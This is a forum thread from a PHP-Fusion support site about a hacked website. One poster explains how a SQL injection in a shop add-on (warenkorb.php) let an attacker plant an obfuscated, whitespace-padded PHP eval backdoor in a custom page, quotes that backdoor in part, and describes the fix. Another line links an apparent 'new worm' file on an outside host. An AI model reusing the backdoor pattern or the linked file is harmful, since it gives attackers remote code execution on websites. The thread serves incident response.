Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.

My site was hacked

Have had the same experience with a customers site. Hacker injected some code in a custom_pages page. And used this (as far as I can see) to execute something through viewpage.php.
Would be interesting to know what infusions and other scripts you had installed on your webspace...

First, check the fusion_errors table as tojans are often not programmed that clean and tend to produce warnings or errors. This record revealed the weak spot on my site to me:

CodeDownload  
(121, 8, 'A non well formed numeric value encountered', '/web/1/000/051/562/203796/htdocs/infusions/shop_system/warenkorb.php', 121, '/infusions/shop_system/warenkorb.php', 0, '85.25.71.100', 4, 0, 1360061166),



Using warenkorb.php for sql code injection, a new record was added to fusion_custom_pages this way:

CodeDownload  
(2, 'testtitl', 0, '                                                                                                         <?php if(isset($_GET[\\''viewpages\\''])) { $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,
...
...
0,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit; } ?>   



I deleted the record and in the Laaser shop system, which allowed code injection, encapsuled all $_GET and $_POST references with connections to mysql queries in mysql_real_escape_string() function calls.
new worm www.alecxz.altervista.org/infusions/image_hosting/thumbs/1d915cf1732ff8ac7dd34671df14fb7f.jpg
Thread Information
Author
Replies
143 posts
Views
66,813 times
Last Post
Last updated on 7 years ago
You can view all discussion threads in this forum.
You cannot set up a bounty in this discussion thread.
You can start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You can download attachments in this forum.
You cannot up or down-vote on the post in this discussion thread.